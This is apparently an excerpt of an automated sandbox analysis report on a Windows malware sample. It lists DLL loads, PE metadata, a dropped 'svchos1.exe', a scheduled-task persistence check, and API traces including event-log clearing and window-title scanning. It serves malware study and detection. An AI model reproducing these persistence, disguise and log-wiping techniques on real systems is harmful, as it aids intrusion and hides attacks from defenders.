          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SystemProcess18.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: SystemProcess18.exeStatic file information: File size 1756160 > 1048576
          Source: SystemProcess18.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x124200
          Source: SystemProcess18.exeStatic PE information: More than 200 imports for USER32.dll
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: SystemProcess18.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: SystemProcess18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: SystemProcess18.exe, SystemProcess18.exe, 00000000.00000003.1485028271.0000000003DE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\zz\Desktop\CCCC\Release\CCCC.pdb source: SystemProcess18.exe, 00000000.00000000.1226278101.00000000001C6000.00000002.00000001.01000000.00000003.sdmp, SystemProcess18.exe, 00000003.00000000.1266376609.00000000001C6000.00000002.00000001.01000000.00000003.sdmp
          Source: Binary string: \Release\Dll1.pdb source: svchos1.exe
          Source: SystemProcess18.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SystemProcess18.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SystemProcess18.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SystemProcess18.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SystemProcess18.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007C24A8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,28_2_007C24A8
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF5ED9 push esi; ret 0_3_03DF5EE2
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF360C push ds; ret 0_3_03DF3615
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF3620 push esi; ret 0_3_03DF3621
          Source: C:\Users\user\Desktop\SystemProcess18.exeCode function: 0_3_03DF2D28 push ecx; ret 0_3_03DF2D3B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_041A4277 push ebx; ret 10_2_041A42DA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_041A3A9B push ebx; retf 10_2_041A3ADA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_041A3ADB push ebx; retf 10_2_041A3ADA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_007F633D push eax; ret 19_2_007F6351
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B20F5 push ecx; ret 28_2_007B2108
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007B1CA7 push ecx; ret 28_2_007B1CBA
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_034AE134 push eax; ret 28_2_034AE162
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035ED7B0 push eax; ret 28_2_035ED7DE
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_03678A44 push ebp; retf 28_2_03678A48
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B20F5 push ecx; ret 29_2_007B2108
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007B1CA7 push ecx; ret 29_2_007B1CBA
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_009906BF push ebp; ret 29_2_009906C7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_00982B0F push ecx; ret 29_2_00982B22
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01042D8B push ecx; ret 29_2_01042D9E
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_01063C2D push esi; ret 29_2_01063C36
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_029AE134 push eax; ret 29_2_029AE162
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_030AD7B0 push eax; ret 29_2_030AD7DE
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_03138A44 push ebp; retf 29_2_03138A48
          Source: C:\Users\user\Desktop\SystemProcess18.exeFile created: C:\Users\Public\Documents\MM\svchos1.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DF0E0 Sleep,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,28_2_035DF0E0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,28_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,28_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,28_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_007042BD GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,28_2_007042BD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072E467 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,28_2_0072E467
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006EE507 SetForegroundWindow,IsIconic,28_2_006EE507
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006EE5AB IsIconic,28_2_006EE5AB
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072E9F2 IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,28_2_0072E9F2
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006D909A SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,28_2_006D909A
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006E9135 IsWindowVisible,IsIconic,28_2_006E9135
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072F5B7 IsIconic,PostMessageW,28_2_0072F5B7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_0072D6D8 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,28_2_0072D6D8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006B1D70 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,28_2_006B1D70
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035DD260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,28_2_035DD260
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,29_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,29_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,29_2_0072E167
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_007042BD GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,29_2_007042BD
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072E467 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,29_2_0072E467
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006EE507 SetForegroundWindow,IsIconic,29_2_006EE507
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006EE5AB IsIconic,29_2_006EE5AB
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072E9F2 IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,29_2_0072E9F2
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006D909A SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,29_2_006D909A
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006E9135 IsWindowVisible,IsIconic,29_2_006E9135
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072F5B7 IsIconic,PostMessageW,29_2_0072F5B7
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0072D6D8 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,29_2_0072D6D8
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_006B1D70 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,29_2_006B1D70
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 29_2_0309D260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,29_2_0309D260
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_035CE550 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,28_2_035CE550
          Source: C:\Users\Public\Documents\MM\svchos1.exeCode function: 28_2_006C7777 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_006C7777
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
